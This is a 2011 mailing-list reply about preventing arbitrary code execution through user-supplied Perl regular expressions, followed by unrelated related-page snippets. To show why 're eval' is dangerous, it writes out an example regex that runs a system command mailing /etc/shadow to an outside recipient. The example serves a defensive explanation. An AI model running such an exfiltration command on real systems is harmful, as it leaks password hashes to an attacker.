Re: regexp validation (arbitrary code execution) (regexp injection)

On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
Suppose you have a collection of books, and want to provide your users
with the ability to search the book title, author or content using
regular expressions.

But you don't want to let them execute any code.

How would you validate/compile/evaluate the user provided regex so as to
provide maximum flexibility and prevent code execution?

In general this shouldn't be a problem provided you don't turn on

use re "eval";

$ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print
"hello" })/ at -e line 1.

$ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })'

Of course, you're not going to be too worried about people saying hello,
but once you can execute arbitrary code all bets are off:

$ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\ < /etc/shadow" ])'

Make sure you don't do the whole match as part of a string eval, and
since you're only matching, you shouldn't have to worry about s///e.

If you prefer a more paranoid approach you might want to restrict the
characters you allow in the user input, but this doesn't provide maximum

Paul Johnson - paul@xxxxxxxx

Relevant Pages

  • Re: PROJ 2000: Inserted Projects not found
    ... The key will only get used if a program prompts for a user input at which ... >> If you execute a VBA command to control Project that might show a dialog ... >> Don't forget to use DisplayAlerts=True at the end of the macro as well. ... the behavior of the third party program must be predictable ...
  • RE: [PHP] escapeshellarg
    ... I have to execute an external command, ... In addition to using escapeshellarg(), I would first determine if the input ...
  • Re: real not psuedo random
    ... My randomness once came from the user input ... naturally HP calc produces only pseudorandom ... SWAP the 2 TIMES and subtract ... of the 2 TIMEs and multiply by 100,000,000 then execute FP. ...
  • escapeshellarg
    ... I have to execute an external command, with an argument (filename or directory name) given by user input, ie something like this: ...
  • Re: attaching code to run on regular expression match
    ... >> I would like some code to execute on the first match (e.g. ... But AFAIK I cannot ask the resulting match which regex he was matched ... I could of course test each ...